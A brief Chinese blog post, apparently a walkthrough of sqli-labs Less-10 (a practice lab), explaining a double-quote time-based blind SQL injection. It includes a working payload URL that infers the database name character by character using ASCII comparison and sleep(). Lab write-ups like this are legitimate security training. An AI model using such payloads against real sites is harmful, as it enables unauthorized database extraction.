Less-10

查看源代码:

sqli-labs ————less -10

由此可见,这里是一个基于时间注入的双引号注入。

猜测数据库:

http://192.168.11.136/sqli-labs/Less-10?id=1" and if (ascii(substr(database(),1,1))=115),1,sleep(5)) --+

sqli-labs ————less -10

之后的猜测表名、字段名、字段值与上一关的基本相同,唯一不同之处就是“ ' ”与“ ””。这里就不再多复述了。


相关文章:

  • 2021-10-26
  • 2021-10-31
  • 2021-04-23
  • 2021-12-16
  • 2021-09-14
  • 2021-10-28
  • 2021-09-24
  • 2021-06-02
猜你喜欢
  • 2021-08-09
  • 2022-12-23
  • 2022-01-09
  • 2021-10-07
  • 2021-06-25
  • 2021-07-17
  • 2021-08-31
相关资源
相似解决方案